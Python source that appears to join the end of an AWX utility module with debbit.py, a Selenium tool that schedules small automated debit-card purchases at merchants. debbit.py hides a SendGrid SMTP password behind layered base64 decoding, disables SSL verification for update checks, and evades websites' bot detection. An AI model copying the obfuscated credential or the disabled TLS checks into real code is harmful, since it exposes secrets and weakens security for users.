"""
Helper for obtaining a pk from user data dict or None if not present.
"""
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
try:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend(
[
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx'
and os.path.isdir(os.path.join(custom_venv_path, x))
and os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
]
)
except Exception:
logger.exception("Encountered an error while discovering custom virtual environments.")
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email', 'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (
getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[: (size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
|
debbit.py | #!/usr/bin/env python3
import base64
import logging
import os
import platform
import random
import smtplib
import ssl
import sys
import time
import traceback
import urllib.request
import zipfile
from datetime import datetime
from datetime import timedelta
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from io import BytesIO
from threading import Timer, Lock, Thread
import coverage
import yaml # PyYAML
from selenium import webdriver
from selenium.common.exceptions import SessionNotCreatedException
from selenium.webdriver.firefox.options import Options
from result import Result
def main():
update_check()
now = datetime.now()
state = load_state(now.year, now.month)
if not state:
LOGGER.info('No purchases yet complete for ' + now.strftime('%B %Y'))
for merchant_id in state:
cur_purchase_count = state[merchant_id]['purchase_count']
LOGGER.info(str(cur_purchase_count) + ' ' + merchant_id + ' ' + plural('purchase', cur_purchase_count) + ' complete for ' + now.strftime('%B %Y'))
LOGGER.info('')
for card, merchants in CONFIG.cards.items():
for merchant_name, merchant_conf in merchants.items():
load_merchant(card, merchant_name, merchant_conf)
def load_state(year, month):
padded_month = '0' + str(month) if month < 10 else str(month)
filename = absolute_path('state', 'debbit_' + str(year) + '_' + padded_month + '.txt')
try:
with open(filename, 'r', encoding='utf-8') as f:
return yaml.safe_load(f.read())
except FileNotFoundError:
return {}
def load_merchant(card, merchant_name, merchant_conf):
try:
web_automation = __import__('program_files.merchants.' + merchant_name, fromlist=["*"]).web_automation
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
LOGGER.error('Error loading ' + merchant_name + '.py from merchants folder')
raise e
merchant = Merchant(card, merchant_name, web_automation, merchant_conf)
if CONFIG.mode == 'spread':
start_spread_schedule(merchant)
if CONFIG.mode == 'burst':
Thread(target=burst_loop, args=(merchant,)).start()
def burst_loop(merchant):
# These 3 variables are modified during each loop
suppress_logs = False
burst_gap = None
skip_time = datetime.fromtimestamp(0)
while True:
now = datetime.now()
state = load_state(now.year, now.month)
this_burst_count = merchant.burst_count
prev_burst_time = 0
cur_purchase_count = state.get(merchant.id, {}).get('purchase_count') or 0
if not burst_gap: # only applies to first loop
burst_gap = get_burst_min_gap(merchant, cur_purchase_count, now)
if merchant.id in state:
if len(state[merchant.id]['transactions']) >= merchant.burst_count:
prev_burst_time = state[merchant.id]['transactions'][merchant.burst_count * -1]['unix_time']
for transaction in state[merchant.id]['transactions'][-min(len(state[merchant.id]['transactions']), merchant.burst_count):]:
if transaction['unix_time'] > int(now.timestamp()) - min(get_burst_min_gap(merchant, cur_purchase_count, now), 3600):
this_burst_count -= 1 # Program was stopped during burst within 60 minutes ago, count how many occurred within the last partial burst
this_burst_count = min(this_burst_count, merchant.total_purchases - cur_purchase_count)
if prev_burst_time < int(now.timestamp()) - burst_gap \
and now.day >= merchant.min_day \
and now.day <= (merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1) \
and cur_purchase_count < merchant.total_purchases \
and now > skip_time:
LOGGER.info('Now bursting ' + str(this_burst_count) + ' ' + merchant.id + ' ' + plural('purchase', this_burst_count))
result = web_automation_wrapper(merchant) # First execution outside of loop so we don't sleep before first execution and don't sleep after last execution
cur_purchase_count += 1
for i in range(this_burst_count - 1):
if result != Result.success:
break
sleep_time = merchant.burst_intra_gap
LOGGER.info('Waiting ' + str(sleep_time) + ' ' + plural('second', sleep_time) + ' before next ' + merchant.id + ' purchase')
time.sleep(sleep_time)
result = web_automation_wrapper(merchant)
cur_purchase_count += 1
burst_gap = get_burst_min_gap(merchant, cur_purchase_count, now) + random.randint(0, int(merchant.burst_time_variance))
if result == Result.skipped:
skip_time = now + timedelta(days=1)
suppress_logs = False
elif not suppress_logs:
log_next_burst_time(merchant, now, prev_burst_time, burst_gap, skip_time, cur_purchase_count)
suppress_logs = True
else:
time.sleep(merchant.burst_poll_gap)
def get_burst_min_gap(merchant, cur_purchase_count, now):
if merchant.burst_min_gap is not None: # Use value in config file
return merchant.burst_min_gap
remaining_purchase_count = merchant.total_purchases - cur_purchase_count
default_burst_min_gap = 79200 # 22 hours
if remaining_purchase_count < 1:
return default_burst_min_gap
month_end_day = merchant.max_day or DAYS_IN_MONTH[now.month] - 1
remaining_secs_in_month = max(0, (datetime(now.year, now.month, month_end_day) - now).total_seconds())
dynamic_burst_min_gap = int(remaining_secs_in_month / 4 / remaining_purchase_count * merchant.burst_count)
return min(dynamic_burst_min_gap, default_burst_min_gap)
def log_next_burst_time(merchant, now, prev_burst_time, burst_gap, skip_time, cur_purchase_count):
prev_burst_plus_gap_dt = datetime.fromtimestamp(prev_burst_time + burst_gap)
cur_month_min_day_dt = datetime(now.year, now.month, merchant.min_day)
if now.month == 12:
year = now.year + 1
month = 1
else:
year = now.year
month = now.month + 1
next_month_min_day_dt = datetime(year, month, merchant.min_day)
if now.day < merchant.min_day:
next_burst_time = prev_burst_plus_gap_dt if prev_burst_plus_gap_dt > cur_month_min_day_dt else cur_month_min_day_dt
next_burst_count = merchant.burst_count
elif cur_purchase_count >= merchant.total_purchases or now.day > (merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1):
next_burst_time = prev_burst_plus_gap_dt if prev_burst_plus_gap_dt > next_month_min_day_dt else next_month_min_day_dt
next_burst_count = merchant.burst_count
else:
next_burst_time = prev_burst_plus_gap_dt
next_burst_count = min(merchant.burst_count, merchant.total_purchases - cur_purchase_count)
if next_burst_time < skip_time:
next_burst_time = skip_time
LOGGER.info('Bursting next ' + str(next_burst_count) + ' ' + merchant.id + ' ' + plural('purchase', next_burst_count) + ' after ' + next_burst_time.strftime("%Y-%m-%d %I:%M%p"))
def start_spread_schedule(merchant):
now = datetime.now()
state = load_state(now.year, now.month)
if merchant.id not in state: # first run of the month
if now.day >= merchant.min_day:
spread_recursion(merchant)
else:
start_offset = (datetime(now.year, now.month, merchant.min_day) - now).total_seconds()
LOGGER.info('Scheduling ' + merchant.id + ' at ' + formatted_date_of_offset(now, start_offset))
Timer(start_offset, spread_recursion, [merchant]).start()
elif state[merchant.id]['purchase_count'] < merchant.total_purchases and now.timestamp() - state[merchant.id]['transactions'][-1]['unix_time'] > merchant.spread_min_gap:
spread_recursion(merchant)
else:
schedule_next_spread(merchant)
def schedule_next_spread(merchant):
now = datetime.now()
state = load_state(now.year, now.month)
cur_purchase_count = state[merchant.id]['purchase_count'] if merchant.id in state else 0
if cur_purchase_count < merchant.total_purchases:
remaining_purchase_count = merchant.total_purchases - cur_purchase_count
month_end_day = merchant.max_day if merchant.max_day else DAYS_IN_MONTH[now.month] - 1
remaining_secs_in_month = (datetime(now.year, now.month, month_end_day) - now).total_seconds()
average_gap = remaining_secs_in_month / remaining_purchase_count
time_variance = merchant.spread_time_variance
while average_gap < time_variance * 2 and time_variance > 60:
time_variance = time_variance / 2
range_min = average_gap - time_variance if average_gap - time_variance > merchant.spread_min_gap else merchant.spread_min_gap
range_max = average_gap + time_variance if average_gap + time_variance > merchant.spread_min_gap else merchant.spread_min_gap
else: # purchases complete for current month, schedule to start purchasing on the 2nd day of next month
if now.month == 12:
year = now.year + 1
month = 1
else:
year = now.year
month = now.month + 1
range_min = (datetime(year, month, merchant.min_day) - now).total_seconds()
if range_min <= 0:
LOGGER.error('Fatal error, could not determine date of next month when scheduling ' + merchant.id)
return
range_max = range_min + merchant.spread_time_variance
start_offset = random.randint(int(range_min), int(range_max))
LOGGER.info('Scheduling next ' + merchant.id + ' at ' + formatted_date_of_offset(now, start_offset))
LOGGER.info('')
Timer(start_offset, spread_recursion, [merchant]).start()
def spread_recursion(merchant):
web_automation_wrapper(merchant)
schedule_next_spread(merchant)
def record_transaction(merchant_id, amount):
now = datetime.now()
LOGGER.info('Recording successful ' + merchant_id + ' purchase')
if not os.path.exists(absolute_path('state')):
os.mkdir(absolute_path('state'))
padded_month = '0' + str(now.month) if now.month < 10 else str(now.month)
filename = absolute_path('state', 'debbit_' + str(now.year) + '_' + padded_month + '.txt')
STATE_WRITE_LOCK.acquire()
state = load_state(now.year, now.month)
if merchant_id not in state:
state[merchant_id] = {
'purchase_count': 0,
'transactions': []
}
cur_purchase_count = state[merchant_id]['purchase_count'] + 1
state[merchant_id]['purchase_count'] = cur_purchase_count
state[merchant_id]['transactions'].append({
'amount': str(amount) + ' cents',
'human_time': now.strftime("%Y-%m-%d %I:%M%p"),
'unix_time': int(now.timestamp())
})
with open(filename, 'w', encoding='utf-8') as f:
f.write(yaml.dump(state))
STATE_WRITE_LOCK.release()
LOGGER.info(str(cur_purchase_count) + ' ' + merchant_id + ' ' + plural('purchase', cur_purchase_count) + ' complete for ' + now.strftime('%B %Y'))
def formatted_date_of_offset(now, start_offset):
return (now + timedelta(seconds=start_offset)).strftime("%Y-%m-%d %I:%M%p")
def web_automation_wrapper(merchant):
failures = 0
threshold = 5
while failures < threshold:
amount = choose_amount(merchant)
driver = get_webdriver(merchant)
error_msg = None
LOGGER.info('Spending ' + str(amount) + ' cents with ' + merchant.id + ' now')
try:
with Coverage() as cov:
result = merchant.web_automation(driver, merchant, amount)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
result = Result.failed
error_msg = traceback.format_exc()
if result == Result.failed:
if not error_msg:
error_msg = 'Result.failed'
LOGGER.error(merchant.id + ' error: ' + error_msg)
failures += 1
record_failure(driver, merchant, error_msg, cov)
close_webdriver(driver, merchant)
if failures < threshold:
LOGGER.info(str(failures) + ' of ' + str(threshold) + ' ' + merchant.id + ' attempts done, trying again in ' + str(60 * failures ** 4) + ' seconds')
time.sleep(60 * failures ** 4) # try again in 1min, 16min, 1.3hr, 4.3hr, 10.4hr
continue
else:
exit_msg = merchant.id + ' failed ' + str(failures) + ' times in a row. NOT SCHEDULING MORE ' + merchant.id + '. Stop and re-run debbit to try again.'
if not CONFIG.send_failures_to_developer:
exit_msg += ' To help get this issue fixed, please set send_failures_to_developer to yes in config.txt or follow instructions at https://jakehilborn.github.io/debbit/#merchant-automation-failed-how-do-i-get-it-fixed'
LOGGER.error(exit_msg)
notify_failure(exit_msg)
raise Exception(exit_msg) # exits this merchant's thread, not entire program
if result == Result.unverified:
record_failure(driver, merchant, 'Result.unverified', cov)
close_webdriver(driver, merchant)
exit_msg = 'Unable to verify ' + merchant.id + ' purchase was successful. Just in case, NOT SCHEDULING MORE ' + merchant.id + '. Stop and re-run debbit to try again.'
if not CONFIG.send_failures_to_developer:
exit_msg += ' To help get this issue fixed, please set send_failures_to_developer to yes in config.txt or follow instructions at https://jakehilborn.github.io/debbit/#merchant-automation-failed-how-do-i-get-it-fixed'
LOGGER.error(exit_msg)
notify_failure(exit_msg)
sys.exit(1) # exits this merchant's thread, not entire program
close_webdriver(driver, merchant)
if result == Result.success:
record_transaction(merchant.id, amount)
return result
def choose_amount(merchant):
now = datetime.now()
state = load_state(now.year, now.month)
if merchant.id not in state: # first purchase, choose any amount in config.txt range
return random.randint(merchant.amount_min, merchant.amount_max)
past_amounts = []
for transaction in state[merchant.id]['transactions']:
past_amounts.append(int(transaction['amount'][:-6])) # '50 cents' -> 50
# The amounts we've spent this month are stored in past_amounts. Generate the range of possible values between
# amount_min and amount_max. Pick a random value in that range, excluding any values in past_amounts. If this
# yields an empty set then we're forced to repeat an amount from earlier in the month. So, let's pick the amount
# furthest in the past in case the merchant doesn't allow duplicate amounts used in some time frame. We do this by
# repeating the same logic, but removing increasingly more elements from the beginning of the month's purchase
# history. By gradually shortening the time frame we're inspecting we'll eventually find a value to use.
for i in range(len(past_amounts) + 1):
remaining_amounts = list(set(range(merchant.amount_min, merchant.amount_max + 1)) - set(past_amounts[i:]))
if remaining_amounts:
return random.choice(remaining_amounts)
def record_failure(driver, merchant, error_msg, cov):
if not os.path.exists(absolute_path('failures')):
os.mkdir(absolute_path('failures'))
filename_prefix = datetime.now().strftime('%Y-%m-%d_%H-%M-%S-%f') + '_' + merchant.name
with open(absolute_path('failures', filename_prefix + '.txt'), 'w', encoding='utf-8') as f:
f.write(VERSION + ' ' + platform.system() + ' ' + error_msg)
try:
driver.save_screenshot(absolute_path('failures', filename_prefix + '.png'))
dom = driver.execute_script("return document.documentElement.outerHTML")
dom = scrub_sensitive_data(dom, merchant)
with open(absolute_path('failures', filename_prefix + '.html'), 'w', encoding='utf-8') as f:
f.write(dom)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
LOGGER.error('record_failure DOM error: ' + traceback.format_exc())
try:
if cov: # cov is None when a debugger is attached
cov.html_report(directory=absolute_path('failures', filename_prefix + '_' + 'coverage'), include='*/merchants/*')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
LOGGER.error('record_failure coverage error: ' + traceback.format_exc())
if CONFIG.send_failures_to_developer:
report_failure(filename_prefix) # TODO put the retry number in here. If first failure, nbd, if recurring failures then it's a bigger problem.
def scrub_sensitive_data(data, merchant):
if not data:
return data
return data \
.replace(merchant.usr, '***usr***') \
.replace(merchant.psw, '***psw***') \
.replace(merchant.card, '***card***') \
.replace(merchant.card[-4:], '***card***') # last 4 digits of card
def report_failure(failure_report_filename_prefix):
mem_zip = BytesIO()
with zipfile.ZipFile(mem_zip, mode='w', compression=zipfile.ZIP_DEFLATED) as z:
for root, dirs, files in os.walk(absolute_path('failures')):
for file in files:
if file.startswith(failure_report_filename_prefix):
z.write(os.path.join(root, file), file)
elif failure_report_filename_prefix in root: # include all files in subdirs that comprise of this failure report
z.write(os.path.join(root, file), os.path.join(root.split(os.sep + 'failures' + os.sep)[1], file))
# sendgrid is blocking delivery of many file types. Sending the zip as a "pdf" seems to work though.
send_email('failure report for developer', 'debbit.failure.notify@gmail.com', failure_report_filename_prefix, 'merchant automation failure report', 'error_report.pdf', 'application/pdf', mem_zip.getvalue())
def notify_failure(exit_msg):
if not CONFIG.notify_failure:
return
to_email = CONFIG.notify_failure
subject = 'Debbit Failure'
if CONFIG.send_failures_to_developer:
html_content = ('{exit_msg}'
'<br><br>'
'This error report was also sent to the debbit developer to be investigated and fixed. Feel free to email '
'jakehilborn@gmail.com or open an "Issue" at https://github.com/jakehilborn/debbit/issues to discuss this '
'error.')\
.format(exit_msg=exit_msg)
else:
html_content = ('{exit_msg}'
'<br><br>'
'<strong>This debbit failure was only sent to you.</strong> To help get this issue fixed, please consider '
'changing send_<i>failures_to_developer</i> to <i>yes</i> in the config.txt file. This will automatically send '
'future error reports to the debbit developer so the issue can be investigated and fixed. You can also share '
'this failure manually via email. In the failures folder there are files with timestamps for names. Each '
'timestamp has 3 files ending in .txt, .png, .html, and a folder ending in _coverage. Email these files to '
'jakehilborn@gmail.com or open an "Issue" at https://github.com/jakehilborn/debbit/issues and attach them '
'there. You can send one error or the whole failures folder, the more errors to inspect the more helpful.')\
.format(exit_msg=exit_msg)
send_email('failure notification', to_email, subject, html_content)
def send_email(purpose, to_email, subject, html_content, attachment_name=None, attachment_type=None, attachment_data=None):
d = [b'U0cueDBSVmZZeVFRRHVHRHpY',
b'WkRsQk4xaGtaeTVYZEhOcFdsWnpRM1ZS',
b'WWpKa2Qxb3dUbFpQVjJSU1ltdEdOV0pyVGpKa01VMHlaVzVHV2xOR1ZrdGlNbmN4WkVabk0xSXhVa1k9']
o = ''
for i in range(len(d)):
s = d[i]
for j in range(i + 1):
s = base64.b64decode(s)
o += s.decode('utf-8')
from_email = 'debbit.failure@debbit.com'
msg = MIMEMultipart()
msg['From'] = from_email
msg['To'] = to_email
msg['Subject'] = subject
msg.attach(MIMEText(html_content, "html"))
if attachment_name:
attachment = MIMEBase(attachment_type.split('/')[0], attachment_type.split('/')[1])
attachment.set_payload(attachment_data)
attachment.add_header('Content-Disposition', 'attachment', filename=attachment_name)
encoders.encode_base64(attachment)
msg.attach(attachment)
try:
server = smtplib.SMTP_SSL('smtp.sendgrid.net', 465)
server.ehlo()
server.login(base64.b64decode('YXBpa2V5Cg==').decode('utf-8').strip(), o)
server.sendmail(from_email, to_email, msg.as_string())
server.close()
LOGGER.info('Successfully sent ' + purpose + ' email to ' + to_email)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
LOGGER.error('Unable to send ' + purpose + ' email')
LOGGER.error(e)
def get_webdriver(merchant):
if os.name == 'nt':
geckodriver_file = 'geckodriver.exe'
else:
geckodriver_file = 'geckodriver'
if os.path.exists(absolute_path('program_files', 'geckodriver.exe')):
geckodriver_path = absolute_path('program_files', 'geckodriver.exe')
elif os.path.exists(absolute_path('program_files', 'geckodriver')):
geckodriver_path = absolute_path('program_files', 'geckodriver')
else:
LOGGER.error(absolute_path('program_files', geckodriver_file) + ' does not exist. Download the latest version of geckodriver from https://github.com/mozilla/geckodriver/releases and extract it. Copy ' + geckodriver_file + ' to ' + absolute_path('program_files'))
sys.exit(1)
WEB_DRIVER_LOCK.acquire() # Only execute one purchase at a time so the console log messages don't inter mix
options = Options()
options.headless = CONFIG.hide_web_browser
profile = webdriver.FirefoxProfile(absolute_path('program_files', 'selenium-cookies-extension', 'firefox-profile'))
# Prevent websites from detecting Selenium via evaluating `if (window.navigator.webdriver == true)` with JavaScript
profile.set_preference("dom.webdriver.enabled", False)
profile.set_preference('useAutomationExtension', False)
try:
driver = webdriver.Firefox(options=options,
service_log_path=os.devnull,
executable_path=geckodriver_path,
firefox_profile=profile)
except SessionNotCreatedException as e:
LOGGER.error(str(e) + '\n')
LOGGER.error('There was a problem starting Firefox. Make sure the latest version of Firefox is installed. If installing/updating Firefox does not fix the issue, try downloading a newer or older version of geckodriver from https://github.com/mozilla/geckodriver/releases and extracting it. Copy ' + geckodriver_file + ' to ' + absolute_path('program_files'))
WEB_DRIVER_LOCK.release()
sys.exit(1)
# Randomize viewport size to help avoid Selenium detection
driver.set_window_size(random.randint(1050, 1350), random.randint(700, 1000))
if merchant.use_cookies:
restore_cookies(driver, merchant)
return driver
def close_webdriver(driver, merchant):
try:
if merchant.use_cookies:
persist_cookies(driver, merchant)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
LOGGER.error(str(e) + ' - proceeding without persisting cookies')
try:
driver.quit()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
try:
WEB_DRIVER_LOCK.release()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
def restore_cookies(driver, merchant):
try:
if os.path.exists(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr)):
with open(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr), 'r', encoding='utf-8') as f:
cookies = f.read()
elif os.path.exists(absolute_path('program_files', 'cookies', merchant.id)): # legacy v2.0 - v2.0.2 cookie format
with open(absolute_path('program_files', 'cookies', merchant.id), 'r', encoding='utf-8') as f:
cookies = f.read()
else:
return
driver.get('file://' + absolute_path('program_files', 'selenium-cookies-extension', 'restore-cookies.html'))
driver.execute_script("document.getElementById('content').textContent = '" + cookies + "'")
driver.execute_script("document.getElementById('status').textContent = 'dom-ready'")
seconds = 30
for i in range(seconds * 10):
if driver.find_element_by_id('status').text == 'done':
return
time.sleep(0.1)
error_msg = 'Unable to restore cookies after ' + str(seconds) + ' seconds'
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
error_msg = str(e)
LOGGER.error(error_msg + ' - proceeding without restoring cookies')
def persist_cookies(driver, merchant):
driver.get('file://' + absolute_path('program_files', 'selenium-cookies-extension', 'persist-cookies.html'))
seconds = 30
for i in range(seconds * 10):
if driver.find_element_by_id('status').text == 'dom-ready':
break
if i == seconds * 10 - 1:
LOGGER.error('Unable to restore cookies after ' + str(seconds) + ' seconds - proceeding without restoring cookies')
return
time.sleep(0.1)
cookies = driver.find_element_by_id('content').text
if not os.path.exists(absolute_path('program_files', 'cookies')):
os.mkdir(absolute_path('program_files', 'cookies'))
with open(absolute_path('program_files', 'cookies', merchant.name + '_' + merchant.usr), 'w', encoding='utf-8') as f:
f.write(cookies)
if os.path.exists(absolute_path('program_files', 'cookies', merchant.id)): # legacy v2.0 - v2.0.2 cookie format
os.remove(absolute_path('program_files', 'cookies', merchant.id))
def absolute_path(*rel_paths): # works cross platform when running source script or Pyinstaller binary
script_path = sys.executable if getattr(sys, 'frozen', False) else os.path.abspath('__file__')
return os.path.join(os.path.dirname(script_path), *rel_paths)
def plural(word, count):
if count == 1:
return word
return word + 's'
def update_check():
non_ssl_context = ssl.SSLContext() # Having issues with Pyinstaller executables throwing SSL errors. Disabling SSL verification for GET operations to static GitHub pages.
try:
latest_version = int(urllib.request.urlopen('http://jakehilborn.github.io/debbit/updates/latest.txt', context=non_ssl_context).read())
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
LOGGER.error('Unable to check for updates. Check https://github.com/jakehilborn/debbit/releases if interested.')
return
if VERSION_INT >= latest_version:
return
changelog = '\n\nDebbit update available! Download latest release here: https://github.com/jakehilborn/debbit/releases\n'
try:
for i in range(VERSION_INT, latest_version):
changelog += '\n' + urllib.request.urlopen('http://jakehilborn.github.io/debbit/updates/changelogs/' + str(i + 1) + '.txt', context=non_ssl_context).read().decode('utf-8')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
pass
LOGGER.info(changelog)
return
def pyinstaller_runtime_patches():
if not getattr(sys, 'frozen', False):
return # only apply runtime patches if this is a Pyinstaller binary
# workaround so PyInstaller can dynamically load program_files/merchants/*.py
sys.path.insert(0, absolute_path())
# force Coverage to look for assets in program_files directory.
# This nasty patch is for coverage v5.1 and may break if the dependency is updated.
__import__('coverage.html', fromlist=["*"]).STATIC_PATH = [absolute_path('program_files', 'coverage-htmlfiles')]
class Coverage:
def __init__(self):
if sys.gettrace():
LOGGER.warning('Debugger detected. Not attaching coverage module to merchant automation since it disables the debugger.')
self.cov = None
else:
self.cov = coverage.Coverage(data_file=None, branch=True)
def __enter__(self):
if self.cov:
self.cov.start()
return self.cov
def __exit__(self, type, value, traceback):
if self.cov:
self.cov.stop()
class Merchant:
def __init__(self, card, name, web_automation, merchant_config):
self.id = str(card) + '_' + name
self.name = name
self.web_automation = web_automation
self.total_purchases = merchant_config['total_purchases']
self.amount_min = merchant_config['amount_min']
self.amount_max = merchant_config['amount_max']
self.usr = str(merchant_config['usr'])
self.psw = str(merchant_config['psw'])
self.card = str(merchant_config['card'])
if CONFIG.mode == 'burst' and not merchant_config.get('burst_count'):
LOGGER.error(self.id + ' config is missing "burst_count"')
sys.exit(1)
self.burst_count = merchant_config['burst_count']
# Optional advanced config or default values.
self.use_cookies = merchant_config.get('advanced', {}).get('use_cookies', True)
self.min_day = merchant_config.get('advanced', {}).get('min_day', 2) # avoid off by one errors in all systems
self.max_day = merchant_config.get('advanced', {}).get('max_day') # calculated dynamically if None is returned
self.burst_min_gap = merchant_config.get('advanced', {}).get('burst', {}).get('min_gap') # calculated dynamically if None is returned
self.burst_time_variance = merchant_config.get('advanced', {}).get('burst', {}).get('time_variance', 14400) # 4 hours
self.burst_intra_gap = merchant_config.get('advanced', {}).get('burst', {}).get('intra_gap', 30) # 30 seconds
self.burst_poll_gap = merchant_config.get('advanced', {}).get('burst', {}).get('poll_gap', 300) # 5 minutes
self.spread_min_gap = merchant_config.get('advanced', {}).get('spread', {}).get('min_gap', 14400) # 4 hours
self.spread_time_variance = merchant_config.get('advanced', {}).get('spread', {}).get('time_variance', 14400) # 4 hours
class Config:
def __init__(self, config):
if config.get('mode') != 'burst' and config.get('mode') != 'spread':
LOGGER.error('Set config.txt "mode" to burst or spread')
sys.exit(1)
self.mode = config.get('mode')
self.hide_web_browser = config.get('hide_web_browser')
if config.get('notify_failure') == 'your.email@website.com':
self.notify_failure = None
else:
self.notify_failure = config.get('notify_failure')
self.send_failures_to_developer = config.get('send_failures_to_developer')
self.cards = config # The remainder of the config is cards so we can copy the whole dict. Need to remove global config that is stored at the same level though.
for key in ['mode', 'hide_web_browser', 'notify_failure', 'send_failures_to_developer']:
self.cards.pop(key, None)
if __name__ == '__main__':
LOGGER = logging.getLogger('debbit')
LOGGER.setLevel(logging.INFO)
log_format = '%(levelname)s: %(asctime)s %(message)s'
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setFormatter(logging.Formatter(log_format))
LOGGER.addHandler(stdout_handler)
file_handler = logging.FileHandler(absolute_path('program_files', 'debbit_log.log'))
file_handler.setFormatter(logging.Formatter(log_format))
LOGGER.addHandler(file_handler)
pyinstaller_runtime_patches()
# configure global constants
STATE_WRITE_LOCK = Lock()
WEB_DRIVER_LOCK = Lock()
DAYS_IN_MONTH = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}
VERSION = 'v2.1.3-dev'
VERSION_INT = 8
LOGGER.info(' __ __ __ _ __ ')
LOGGER.info(' ____/ /__ / /_ / /_ (_) /_')
LOGGER.info(' / __ / _ \/ __ \/ __ \/ / __/')
LOGGER.info('/ /_/ / __/ /_/ / /_/ / / /_ ')
LOGGER.info('\__,_/\___/_.___/_.___/_/\__/ ' + VERSION)
LOGGER.info('')
config_to_open = None
for config_file in ['config.yml', 'config.txt']:
if os.path.exists(absolute_path(config_file)):
config_to_open = config_file
break
if config_to_open is None:
LOGGER.error('Config file not found.')
LOGGER.error('Copy and rename sample_config.txt to config.txt or config.yml.')
LOGGER.error('Then, put your credentials and debit card info in the file.')
sys.exit(1)
with open(absolute_path(config_to_open), 'r', encoding='utf-8') as config_f:
try:
config_dict = yaml.safe_load(config_f.read())
except yaml.YAMLError as yaml_e:
config_error_msg = '\n\nFormatting error in ' + config_to_open + '. Ensure ' + config_to_open + ' has the same structure and spacing as the examples at https://jakehilborn.github.io/debbit/'
if hasattr(yaml_e, 'problem_mark'):
